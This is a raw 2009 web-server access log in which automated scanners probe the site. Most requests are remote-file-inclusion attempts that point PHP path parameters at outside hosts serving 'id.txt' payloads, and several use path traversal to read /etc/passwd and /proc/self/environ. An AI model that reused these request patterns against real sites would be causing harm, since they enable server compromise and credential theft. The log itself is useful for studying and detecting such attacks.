221.143.40.39 - - [16/Sep/2009:10:55:15 -0700] "GET /logs/access_081223.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:55:20 -0700] "GET /logs/access_080209.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:55:21 -0700] "GET /logs/access_081223.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:55:25 -0700] "GET /logs/access_080209.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:10:55:31 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:10:55:31 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:10:55:31 -0700] "GET /logs/access_080229.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:55:33 -0700] "GET /admin/header.php?loc=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:55:33 -0700] "GET /logs//admin/header.php?loc=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:55:33 -0700] "GET /logs/access_090821.log//admin/header.php?loc=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:55:33 -0700] "GET /logs/access_080115.log//admin/header.php?loc=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:55:33 -0700] "GET /logs/access_080115.log%20%20//admin/header.php?loc=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.65.153 - - [16/Sep/2009:10:55:38 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/007-4.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:55:39 -0700] "GET /logs/access_071216.log%20%20//admin/header.php?loc=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:10:55:45 -0700] "GET /logs/access_080229.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:55:54 -0700] "GET /logs/access_081223.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:55:54 -0700] "GET /logs/access_080209.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.205.88 - - [16/Sep/2009:10:56:33 -0700] "GET /logs//index2.php?pag=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:56:34 -0700] "GET /logs/access_081016.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:56:45 -0700] "GET /logs//admin/header.php?loc=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:56:45 -0700] "GET /logs/access_080115.log//admin/header.php?loc=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:56:45 -0700] "GET /logs/access_090821.log//admin/header.php?loc=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:56:45 -0700] "GET /admin/header.php?loc=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:56:46 -0700] "GET /logs/access_080115.log%20%20//admin/header.php?loc=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:56:49 -0700] "GET /logs/access_071216.log%20%20//admin/header.php?loc=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:10:56:56 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:10:56:56 -0700] "GET /logs/access_081026.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:10:56:56 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:10:56:57 -0700] "GET /logs/access_080319.log/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:10:56:57 -0700] "GET /logs/access_081109.log/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.115.174 - - [16/Sep/2009:10:57:06 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:10:57:19 -0700] "GET /logs/access_081013.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.205.88 - - [16/Sep/2009:10:57:25 -0700] "GET /logs//index2.php?page=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:58:03 -0700] "GET /logs/access_080522.log/index.phpmain.php?x=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:58:03 -0700] "GET /logs/access_080614.log/index.phpmain.php?x=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:58:03 -0700] "GET /logs/index.phpmain.php?x=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:58:03 -0700] "GET /logs/access_080614.log%20%20/index.phpmain.php?x=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:58:03 -0700] "GET /logs/access_080522.log%20%20/index.phpmain.php?x=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:58:04 -0700] "GET /index.phpmain.php?x=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 8106 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:10:58:06 -0700] "GET /logs/access_080214.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:58:08 -0700] "GET /logs/index.phpmain.php?x=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:58:08 -0700] "GET /logs/access_080614.log/index.phpmain.php?x=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:58:08 -0700] "GET /logs/access_080522.log/index.phpmain.php?x=http://fobe.fileave.com/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:58:09 -0700] "GET /index.phpmain.php?x=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 8106 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:58:09 -0700] "GET /logs/access_080614.log%20%20/index.phpmain.php?x=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:58:09 -0700] "GET /logs/access_080522.log%20%20/index.phpmain.php?x=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:10:58:38 -0700] "GET /logs/access_080214.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.205.88 - - [16/Sep/2009:10:59:25 -0700] "GET /logs//index.php?pag=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
210.166.221.168 - - [16/Sep/2009:10:59:53 -0700] "GET /logs/access_090213.log/index.php?pg=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:11:02:33 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:11:02:33 -0700] "GET /logs/access_090409.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:11:02:33 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:11:02:53 -0700] "GET /logs/access_090409.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:11:02:54 -0700] "GET /logs/access_070725.log HTTP/1.0" 200 66166 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:11:03:07 -0700] "GET /logs/access_090721.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.211.29 - - [16/Sep/2009:11:03:20 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.29 - - [16/Sep/2009:11:03:21 -0700] "GET /presto/?M=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
218.38.136.251 - - [16/Sep/2009:11:05:16 -0700] "GET /logs/access_080529.log/show_news.php?cutepath=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.251 - - [16/Sep/2009:11:05:17 -0700] "GET /logs/show_news.php?cutepath=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.251 - - [16/Sep/2009:11:05:17 -0700] "GET /show_news.php?cutepath=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:11:05:23 -0700] "GET /logs/access_080713.log HTTP/1.0" 200 2593998 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.38.136.251 - - [16/Sep/2009:11:05:29 -0700] "GET /logs/access_081013.log/show_news.php?cutepath=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.144.46 - - [16/Sep/2009:11:05:35 -0700] "GET /become_editor.php?theme_path=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.144.46 - - [16/Sep/2009:11:05:35 -0700] "GET /logs/become_editor.php?theme_path=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.144.46 - - [16/Sep/2009:11:05:35 -0700] "GET /logs/access_090807.log%20%20/become_editor.php?theme_path=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.144.46 - - [16/Sep/2009:11:05:41 -0700] "GET /logs/access_090807.log%20%20/become_editor.php?theme_path=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.144.46 - - [16/Sep/2009:11:05:41 -0700] "GET /become_editor.php?theme_path=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.144.46 - - [16/Sep/2009:11:05:41 -0700] "GET /logs/become_editor.php?theme_path=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.144.46 - - [16/Sep/2009:11:05:48 -0700] "GET /logs/access_090903.log%20%20/become_editor.php?theme_path=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.144.46 - - [16/Sep/2009:11:05:54 -0700] "GET /logs/access_090903.log%20%20/become_editor.php?theme_path=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:11:06:02 -0700] "GET /become_editor.php?theme_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:11:06:02 -0700] "GET /logs/become_editor.php?theme_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:11:06:03 -0700] "GET /logs/access_090807.log%20%20/become_editor.php?theme_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:11:06:11 -0700] "GET /logs/access_090903.log%20%20/become_editor.php?theme_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.144.46 - - [16/Sep/2009:11:07:08 -0700] "GET /logs/access_090807.log/become_editor.php?theme_path=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.144.46 - - [16/Sep/2009:11:07:08 -0700] "GET /logs/access_090903.log/become_editor.php?theme_path=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.144.46 - - [16/Sep/2009:11:07:09 -0700] "GET /logs/access_090807.log/become_editor.php?theme_path=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.144.46 - - [16/Sep/2009:11:07:09 -0700] "GET /logs/access_090903.log/become_editor.php?theme_path=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:11:07:35 -0700] "GET /logs/access_090903.log/become_editor.php?theme_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:11:07:35 -0700] "GET /logs/access_090807.log/become_editor.php?theme_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:11:08:24 -0700] "GET /logs/access_080529.log%20%20///////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:11:08:24 -0700] "GET /logs///////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 200 117474 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:11:08:27 -0700] "GET //////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 200 19954 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:09:55 -0700] "GET /logs/access_090724.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:09:57 -0700] "GET /logs/access_090906.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:09:59 -0700] "GET /logs/access_090304.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:11:10:56 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:11:10:56 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:11:10:56 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:11:10:59 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:11:10:59 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:11:10:59 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:11:11:52 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:12:09 -0700] "GET /logs/access_081001.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:12:15 -0700] "GET /logs/access_080902.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:11:12:33 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:11:13:13 -0700] "GET /logs/access_080518.log%20%20//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:11:13:17 -0700] "GET /logs/access_080518.log%20%20//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:11:14:51 -0700] "GET /logs/access_080121.log%20/inurl:%22.php?id=%22 HTTP/1.1" 404 275 "-" "libwww-perl/5.830" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:11:14:51 -0700] "GET /logs/access_080121.log%20/inurl:%22.php?id=%22 HTTP/1.1" 404 275 "-" "libwww-perl/5.830" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:11:14:52 -0700] "GET /inurl:%22.php?id=%22 HTTP/1.1" 404 275 "-" "libwww-perl/5.830" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:11:14:52 -0700] "GET /inurl:%22.php?id=%22 HTTP/1.1" 404 275 "-" "libwww-perl/5.830" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:11:14:53 -0700] "GET /logs/inurl:%22.php?id=%22 HTTP/1.1" 404 275 "-" "libwww-perl/5.830" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:11:14:54 -0700] "GET /logs/inurl:%22.php?id=%22 HTTP/1.1" 404 275 "-" "libwww-perl/5.830" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:15:18 -0700] "GET /logs/scriptsold.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:11:15:49 -0700] "GET /logs/access_080319.log/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:11:15:57 -0700] "GET /logs/access_081109.log/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:16:21 -0700] "GET /logs/access_080618.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:16:23 -0700] "GET /logs/access_080701.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:11:16:30 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:11:16:35 -0700] "GET /logs/access_080328.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.212.41.182 - - [16/Sep/2009:11:16:38 -0700] "GET /logs/access_090204.log%20//calendar.php?p=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
89.212.41.182 - - [16/Sep/2009:11:16:40 -0700] "GET /logs/access_090204.log%20//calendar.php?p=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:11:16:58 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:11:16:58 -0700] "GET /logs/access_081012.log//index.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [16/Sep/2009:11:17:00 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
66.240.176.66 - - [16/Sep/2009:11:17:02 -0700] "GET /index.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 200 19775 "-" "Mozilla/5.0" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:11:17:23 -0700] "GET /logs/access_090213.log//index.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:11:18:07 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:11:18:07 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
